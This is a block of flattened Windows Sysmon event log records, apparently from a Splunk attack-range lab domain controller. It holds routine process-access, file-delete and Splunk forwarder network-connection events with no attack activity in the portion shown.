13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB55B02974472A5918FA12361C25B92D,SHA256=1BF34FD72B6EA736DA168F995279CB31794D3ABDD247749DC8B8B42987007AF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:11.374{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879489F440DC16C69698FC28D7920136,SHA256=E7FB8066FFC1B5EB27A95FA4E7976487B74EC8721FE457FA3F4430B7098AE7A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:12.546{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68DFE6F3822732265D4842E2C771F5C7,SHA256=4A4ED90AA3B8AF43CD142CAF06375E6C4D5E788DEE023522807D0CC7F45E8994,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:13.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3498ED2C2265996775753DA8EA7780,SHA256=C543C5F1CAC372FFD05AEA56A85190AFC3EB5A7D175D77AB32C9A736CB685914,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:11.082{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53367-false10.0.1.12-8000- 23542300x8000000000000000100932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:14.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C4F6A4EC50351A1CC5DC54FDF0FBB67,SHA256=DD4CCB0350979D9B914710ADE7FD01BBEBB455759798E781246F25480ED71B7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:15.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A53BF82E1BA87F290AE52E61B7FD397,SHA256=B1AF1628151267D96544A3C7CA5A898EA1ED1F6275052896D35CDA6586B135FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:16.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E020C6DA6E65FC9E422E3EFEDB51881,SHA256=136EB76FE999CABA995DC920D83203767DC7C0ABBD4611474CCCA6F19AAE61F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:17.796{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=DC651C76E26A5A00195DE6B03C210C66,SHA256=96597C293CBE39C92A810E21C86D27B26BBA6DFF9262465F025B86A240D9B07D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:18.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C4A0AD1874502B103E9873993F5619,SHA256=C21B7EF6259ED939239911FD9232E66842B2CCFF6A5C25626CBC6DDC2DD2BFBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:19.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B4FCEDEE3F123AC654210A61CE133F5,SHA256=74AB0DC551F7D2D0C0E422D4F0DC9E946D636D680C4E7D296F07A188DA3BB974,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:19.093{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1C696A5D5E4CF02BFD18EF2B7C1F46D9,SHA256=437DDC608CE1E6AF268C8727EDFEA8051DEFA882F82639404216D5D788BDCA91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:20.202{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FAAB2958403D0EE87DC484D2DF6DA1,SHA256=C319F270164E2166A736DC804D1FD5ED6D55DCDD2625E52A231C2A2FC46300C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:16.145{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53368-false10.0.1.12-8000- 23542300x8000000000000000100942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:21.296{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D4CCA2E264026150921C0A9A9BF5F1,SHA256=A5C0D843B695F5399BCDD6456FF5E72F3C8F6A91A3388AC781852D0560FA8688,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:22.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441BB6DA4DD4155A0CFEFA457C7524D7,SHA256=A628071393167D26BDB3696D6A0CABFCAA6A9D0B4AD0DA278DEBAC660B8CCE8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:23.687{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:23.484{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4401C0EACDFEA77244CCB0A53AED3C,SHA256=7B6AB56C95FD30C30AF1DB57CEB4A90CFF6671C7E3DB7A39F68050F40DFAC951,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:24.577{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05854E40DBE48F6EDD700147359F5D0C,SHA256=D247B9C8B2F228BC13ED395A359345E6CDFC73F9CDCE40D3B25121BA973BF2A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:25.671{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3656203FB79F86403ED851045C9130D5,SHA256=7239F604209E11291439531407F6119D768665E66B3EB1E24503C9C0EEF1C884,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:21.598{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53369-false10.0.1.12-8089- 23542300x8000000000000000100950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:26.765{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883DC00324367A1203808CAF9FC2D739,SHA256=14AD25ECA5FE76813E21B1F8FD72C3291E951F3C6999AC13A684758B07ED40D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 